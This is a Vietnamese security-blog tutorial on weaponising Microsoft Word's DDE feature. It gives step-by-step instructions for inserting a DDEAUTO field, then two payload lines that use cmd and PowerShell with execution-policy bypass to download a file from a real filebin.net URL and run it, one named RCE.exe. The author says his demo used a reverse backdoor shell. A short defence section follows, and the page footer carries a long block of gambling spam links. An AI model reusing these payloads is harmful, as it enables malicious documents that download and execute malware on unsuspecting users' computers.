• Kiến thức
  • Network
  • Security
  • Software
  • Thủ thuật
  • Tin học văn phòng
  • Tin tức
  • Mail ảo tạm thời miễn phí
  • Tools tra cứu thông tin
  • Công cụ đổi số thành chữ
AnonyViet
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
AnonyViet
No Result
View All Result

Phương pháp đính kèm Virus bằng file Word để Hack máy tính

AnonyViet by AnonyViet
14/04/2021 - Updated on 24/07/2025
in Basic Hacking
A A
1

Mục lục bài viết

  1. Vậy DDE là gì?
  2. Nguy hiểm vậy tại sao Microsoft lại không fix?
  3. Kỹ thuật đính kèm Virus vào file Word
  4. Cách phòng chống
  5. Câu hỏi thường gặp
    1. DDE trong Word là gì và tại sao nó lại nguy hiểm?
    2. Tôi có thể làm gì để bảo vệ máy tính khỏi nguy cơ này?
    3. Nếu tôi vô tình mở một file Word chứa mã độc, điều gì sẽ xảy ra?

Microsoft Word là phần mềm soạn thảo văn bản hầu như máy tính nào cũng được cài đặt. Vậy làm thế nào hacker có thể “hack” máy tính của bạn chỉ với file word? Trong Word có chức năng gọi là DDE, và Hacker có thể lợi dụng tính năng này để phát tán Virus.

📢 Tham gia kênh Telegram của AnonyViet
👉 Vào Telegram AnonyViet
Cập nhật bài mới, tools hay và thủ thuật IT nhanh nhất

Vậy DDE là gì?

DDE là viết tắt của Dynamic Data Exchange và đây là một tính năng của Office cho phép ứng dụng Office tải dữ liệu từ các ứng dụng Office khác. Ví dụ: tệp Word có thể cập nhật bảng bằng cách kéo dữ liệu từ tệp Excel mỗi khi tệp Word được mở. Tính năng này giúp Word có thể chia sẻ và trao đổi dữ liệu với các ứng dụng khác.

Các bài viết liên quan

copy ChatGPT sang Word bị lỗi font

Copy ChatGPT sang Word bị lỗi font phải làm sao?

29/03/2026
Save image as Type chứa mã độc

Save image as Type chứa mã độc: Gỡ ngay kẻo mất tiền oan!

19/03/2026
Giải pháp Office tích hợp AI “nhẹ mà chất”: WPS Pro AI có phải lựa chọn kinh tế? 7

Giải pháp Office tích hợp AI “nhẹ mà chất”: WPS Pro AI có phải lựa chọn kinh tế?

03/03/2026
Cách hacker sử dụng kĩ thuật Splitfus để thực thi mã độc Powershell 8

Cách hacker sử dụng kĩ thuật Splitfus để thực thi mã độc Powershell

20/07/2025 - Updated on 25/07/2025

DDE có khả năng cho phép file Word khi được mở có thể thực thi đoạn mã lưu trữ trong một file khác và cho phép các ứng dụng có thể gửi bản cập nhật dữ liệu mới.

Ngay khi đọc xong câu này, các bạn nên mở máy tính/laptop lên và kiểm tra xem Microsoft Office của bạn có bật chức năng DDE này hay không.

Nhấn nút cửa sổ Windown -> gõ tìm “Registry Editor” –> Truy cập theo từng mục như sau: \HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Security\ –> Nhìn cột Name nếu các bạn thấy tên là “AllowDDE” thì lập tức xóa ngay nhé (Ngoại trừ các bạn hiểu rõ về chức năng này còn không thì hãy xóa đi nhé!)

kiểm tra dde trong word

Nguy hiểm vậy tại sao Microsoft lại không fix?

Vào ngày 23/08/2017, báo cáo đầu tiên đã được gửi lên Microsoft.

Đến ngày 26/09/2017, Microsoft đã phản hồi lại rằng đây là 1 TÍNH NĂNG và Microsoft đã đưa ra khuyến cáo để người dùng Office có thể tự bảo vệ mình khỏi các cuộc tấn công. Cách đơn giản nhất để giữ an toàn là cẩn trọng trước mọi thông điệp lạ hiện ra mỗi khi mở các tệp văn bản.

Đến 12/2017, Microsoft chính thức cập nhật thay đổi cho Microsoft Word, vẫn giữ chức năng DDE, nhưng mặc định khi người dùng mở file word có DDE, link (hoặc lệnh) sẽ không được kích hoạt tự động.

Kỹ thuật đính kèm Virus vào file Word

Đây là không hẵn là chèn virus mà sẽ kích hoạt lệnh tải virus về và kích hoạt khi bạn mở file Word lên.

Bây giờ mình sẽ tiến hành trình bày chi tiết cách hacker đã chiếm quyền điều khiển máy bạn bằng file Word.

Về cơ bản, đầu tiên mở file Word lên, vào Insert -> Quick Parts -> Field…

field

Sẽ có 1 bảng hiện ra, tiến hành click double vào ” = (Formula ) ”

Phương pháp đính kèm Virus bằng file Word để Hack máy tính 5

1 dòng chữ sẽ hiện ra, chuột phải vào, chọn “Toggle Field Codes”

Toggle Field Codes

Thay đổi nội dung trong ngoặc thành code sau:

DDEAUTO "C:\\Windows\\System32\\cmd.exe" "/k calc.exe"

Mục đích của câu lệnh trên: truy cập và Command Prompt (cmd) trên Windows và mở ứng dụng máy tính (calc.exe )

Save lại và khi mở file này lên, Word sẽ hỏi bạn có muốn bật calc.exe không?

start virus word

Khi nhấn YES, ứng dụng máy tính sẽ được mở

virus word duoc mo anonyviet.com

Câu hỏi đặt ra ở đây là các bạn có thể thấy file Word có thể truy cập vào cmd của windown, vậy thay vì mở ứng dụng máy tính , ta có thể thực thi nhiều quyền khác như, mở powerShell, tạo backdoor, tải file virus về máy và chiếm quyền điều khiển máy tính.

Ví dụ câu lệnh:

code virus word office

{ DDEAUTO "C:\\windows\\system32\\cmd.exe /k powershell -NoP -NonI -Exec Bypass IEX (New-Object System.Net.WebClient).DownloadFile('https://filebin.net/hrarledvb6twlgek/test.txt?t=9gxtd1yk%27%2C%27test1.txt');start 'test1.txt' # " "for security reasons click YES" }

Mục đích: Tải file txt từ trang web trên và thực thi mở file vừa tải.

Phương pháp đính kèm Virus bằng file Word để Hack máy tính 6

{ DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\cmd.exe /k powershell -NoP -NonI -Exec Bypass IEX (New-Object System.Net.WebClient).DownloadFile('https://filebin.net/hrarledvb6twlgek/test.txt?t=9gxtd1yk%27%2C%27test1.txt');start 'RCE.exe' # " "for security reasons click YES" }

Thay đổi từ file txt thành file EXE và thực thi ( tùy mục đích file EXE này được tạo ra với mục đích gì ví dụ như Malware, Virus, Trojan,….. ) Trong video mình demo, mục đích file EXE là reverse backdoor shell windows.

Cách phòng chống

Với mức độ nguy hiểm như vậy, chúng ta nên làm gì?

  • Đầu tiên kể đến trước là làm lưu ý trên cùng mình vừa nêu.
  • Quét virus với file vừa tải về

Ví dụ trang web https://www.virustotal.com/gui/

  • Cẩn thận những file từ những nguồn không uy tín
  • Nếu nghi ngờ, hãy ra quán nét để test trước .

Hi vọng qua bài viết này có thể bảo vệ mọi người tránh những thủ đoạn nguy hiểm của các hacker

Cảm ơn mọi người đã dành thời gian đọc bài viết này ^^! Chúc mọi người một ngày tốt lành.

Bài viết của tác giả Nguyễn Quốc Khánh chia sẻ trong Group Nhận thức về an ninh mạng cùng Hieupc và những người bạn – 7Onez.com

Câu hỏi thường gặp

DDE trong Word là gì và tại sao nó lại nguy hiểm?

DDE (Dynamic Data Exchange) là tính năng của Microsoft Office cho phép các ứng dụng Office trao đổi dữ liệu. Hacker có thể lợi dụng DDE để chèn mã độc vào file Word, thực thi các lệnh nguy hiểm trên máy tính của bạn khi file được mở.

Tôi có thể làm gì để bảo vệ máy tính khỏi nguy cơ này?

Hãy xóa mục “AllowDDE” trong Registry Editor (HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Security\) hoặc cập nhật Microsoft Office lên phiên bản mới nhất. Quan trọng nhất là luôn cẩn thận với các file Word từ nguồn không tin cậy.

Nếu tôi vô tình mở một file Word chứa mã độc, điều gì sẽ xảy ra?

Tùy thuộc vào mã độc được chèn, máy tính của bạn có thể bị nhiễm virus, bị đánh cắp thông tin, hoặc bị điều khiển từ xa. Vì vậy, hãy luôn quét virus cho các file đáng ngờ trước khi mở.

Tags: mã độcmicrosoft wordofficephát tán virus bằng wordvirusWordđính kèm virus vào word
AnonyViet

AnonyViet

20 năm kinh nghiệm trong lĩnh vực Security, các chứng chỉ:OSCP, CCNA, CCNP, CISSP. Kiến thức như một ngọn lửa, càng chia sẽ nó sẽ càng bùng cháy!

Related Posts

copy ChatGPT sang Word bị lỗi font
Kiến thức

Copy ChatGPT sang Word bị lỗi font phải làm sao?

29/03/2026
Save image as Type chứa mã độc
Mạng cơ bản

Save image as Type chứa mã độc: Gỡ ngay kẻo mất tiền oan!

19/03/2026
Giải pháp Office tích hợp AI “nhẹ mà chất”: WPS Pro AI có phải lựa chọn kinh tế? 9
Phần mềm máy tính

Giải pháp Office tích hợp AI “nhẹ mà chất”: WPS Pro AI có phải lựa chọn kinh tế?

03/03/2026
Cách hacker sử dụng kĩ thuật Splitfus để thực thi mã độc Powershell 10
Virus-Trojan-Rat

Cách hacker sử dụng kĩ thuật Splitfus để thực thi mã độc Powershell

20/07/2025 - Updated on 25/07/2025
office miễn phí
Tin tức

Microsoft ra mắt Office miễn phí: Có thực sự đáng dùng?

25/02/2025
Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus 11
Basic Hacking

Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus

10/02/2025 - Updated on 25/07/2025
guest

guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

1 Comment
oldest
newest
Inline Feedbacks
View all comments
B4C
B4C
4 years ago

Hay quá ad ơi

Reply
wpdiscuz   wpDiscuz

Liên hệ Quảng Cáo

Lien he AnonyViet

Bài viết mới

cách bảo vệ ảnh riêng tư trên Mac

4 cách bảo vệ ảnh riêng tư trên Mac giúp bạn tránh rò rỉ thông tin

by Thanh Kim
11/04/2026
0

JOPDF

JOPDF: Phần mềm chỉnh sửa PDF đa năng cho Windows và Mac

by Thanh Kim
10/04/2026
0

app nhắc bảo trì xe máy

MyVehicle: App nhắc bảo trì xe máy tiện lợi và bảo mật

by Thanh Kim
10/04/2026
0

3 tháng Adobe Express Pro miễn phí

Hướng dẫn nhận 3 tháng Adobe Express Pro miễn phí

by Thanh Kim
09/04/2026
0

Bình luận gần đây

  • phuoc trong Cách nâng cấp SuperGrok Heavy miễn phí 1 năm qua Amazon Pay
  • võ văn lợi trong Cách nâng cấp SuperGrok Heavy miễn phí 1 năm qua Amazon Pay
  • Nhật trong Hướng dẫn cài Google TV lên USB để biến PC thành TV
  • cisad trong Share key Driver Booster v13 Pro miễn phí 6 tháng
  • Huy trong Hướng dẫn đăng ký Google Colab Pro 1 Năm Miễn Phí
  • phamphat trong Cách chạy OpenClaw bằng Crawbot: tiết kiệm chi phí
  • AnonyViet trong Hướng dẫn cài OpenClaw – AI Trợ lý cá nhân trên máy tính
  • Sơn trong Hướng dẫn cài OpenClaw – AI Trợ lý cá nhân trên máy tính
  • Hieu trong Share miễn phí bộ 03 Combo khóa học tự học tiếng Anh giao tiếp
  • 45555 trong Sự trỗi dậy của “Người ngoài hành tinh”: Alienware Aurora AC16250 “Vũ khí” tối thượng định hình Gaming năm 2026
  • 45555 trong Cách làm mờ ảnh trên iPhone sau khi chụp cực đơn giản
  • vatuan13 trong Hướng dẫn cài OpenClaw – AI Trợ lý cá nhân trên máy tính
  • vatuan13 trong Hướng dẫn thiết lập định vị giả trên Zalo
  • AnonyViet trong Hướng Dẫn Cấu Hình OpenClaw Trên VPS Ubuntu 2.5G RAM (giá chỉ 18$/năm)
  • hùng lê trong Hướng Dẫn Cấu Hình OpenClaw Trên VPS Ubuntu 2.5G RAM (giá chỉ 18$/năm)
  • Kelvin trong Hướng dẫn thi chứng chỉ bảo mật CTIGA miễn phí 100%
  • Minh trong Hướng dẫn kết nối OpenClaw với Whatsapp
  • AnonyViet trong Hướng Dẫn Cấu Hình OpenClaw Trên VPS Ubuntu 2.5G RAM (giá chỉ 18$/năm)
  • congdk trong Hướng Dẫn Cấu Hình OpenClaw Trên VPS Ubuntu 2.5G RAM (giá chỉ 18$/năm)
  • AnonyViet trong Hướng dẫn cài OpenClaw – AI Trợ lý cá nhân trên máy tính

Giới thiệu

AnonyViet

AnonyViet

Nơi chia sẻ những kiến thức mà bạn chưa từng được học trên ghế nhà trường!

Chúng tôi sẵn sàng đón những ý kiến đóng góp, cũng như bài viết của các bạn gửi đến AnonyViet.

Hãy cùng AnonyViet xây dựng một cộng đồng CNTT lớn mạnh nhất!

Giới thiệu

AnonyViet là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. AnonyViet cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Liên hệ

Email: support[@]anonyviet.com

1409 Hill Street #01-01A
Old Hill Street Police Station
Singapore 179369

 

DMCA.com Protection Status

kết quả xổ số hôm nay U888 33win Ae888 kubet kubet 8kbet 99ok trang chủ sc88 xin88 good88 kubet fm88 kubet thailand vip66 xoso66 https://tp88fun.com/ hello88 qq88 Xoso66 Vip66 hitclub bong99 XOSO66 new882.info Thabet fun88 nhà cái uy tín sunwin sunwin rikvip hitclub sunwin go88 12bet v9bet betvisa betvisa vin777 vin777 ee88 bet88 abc8 c54 https://keonhacai.fund/ sunwin Xoso66 58win fun88.supply EE88 https://da88.design/ https://fun88.supply/ F8BET80 https://q23win.com/ u888 W88 link 58WIN https://bbet88b.com/ OK9 SHBET https://xx88.center/ vswin 789PCOM NHÀ CÁI MMOO TT88COM GO 99 RR88 ABC8 https://nowgoal.ws/ https://tylekeonhacai.me/ https://keonhacai.org.vc/ https://xx88.ac/ xx88.me.uk XN88 NOHU90 AF88 HZ88 https://xx88.asia/ 789f NOHU HITCLUB Sunwin 58WIN MV88 888NEW AZ888 PG99 TD88 12bet v9bet NOHU90 Thabet vip66 7mcn hm88 xoso66 DA88 9BET https://daga.rocks https://c168.info/ LC88 Game SH BET https://jun88sr.com/ NOHU90 https://kjcgaming.com/ https://nohutm.com 789Win https://go8.red/ https://urr88.com/ hit club game bai tg88 kèo nhà cái 5 9 win Sunwin UU88 nổ hũ uy tín Go88 https://bancadoithuong.codes/ https://danhdeonline.blog/ Xocdia88 https://nhacaiuytin10.uk.com/ https://keonhacai88.tv/ https://keonhacai.loans/ https://gamebaidoithuong.io/ https://keonhacai.kiwi/ 789club ok 8386 xx88 V9BET Sun52 https://918xxy.com/ https://go99bet.live/ https://tt88.ae.org/ kjc https://go99.mx/ 79king nhà cái MB66 Alo789 MV88 sc88 11uu vn23 88CLB Thabet nạp tiền qq88 sun win luck8 https://devmarks.io cwin V9bet ALO8.com F168 8kbet KUBET TT88 789club 789club AX88 xoso66 https://sc88.info/ HZ88 MMOO OPEN88 12bet https://nohu90s.asia go88 trang cá độ bóng đá https://nohuq.net/ https://s8inc.com/ SODO https://cm88.uk.net/ ko66 12bet https://cm88.gg/ 8us F168 Jun88 Jun88 fly88 12bet 8DAY https://f168.today/ Vip66 TẢI SUNWIN https://open88seo.com/ Luck8 winvn RED88 VIC88 F168 keobongda.one/ Jun88 https://keonhacaitop.com/ hytw3339 Kết quả bóng đá open88 https://sc88.market/ trang chủ MB66 az888 WIN678 https://789betlol.com/ F168 12bet SH BET vic88 red88 tỷ lệ nhà cái game nổ hũ game bài tỷ số trực tuyến https://qq88pro.vip/ Keonhacai5 23win 7m https://sc88.info/ luckywin hm88 23win 888slot sky88 sodo casino go8 https://fly88h.com/ VIN777

©2026 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về CNTT

No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC

©2026 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về CNTT

wpDiscuz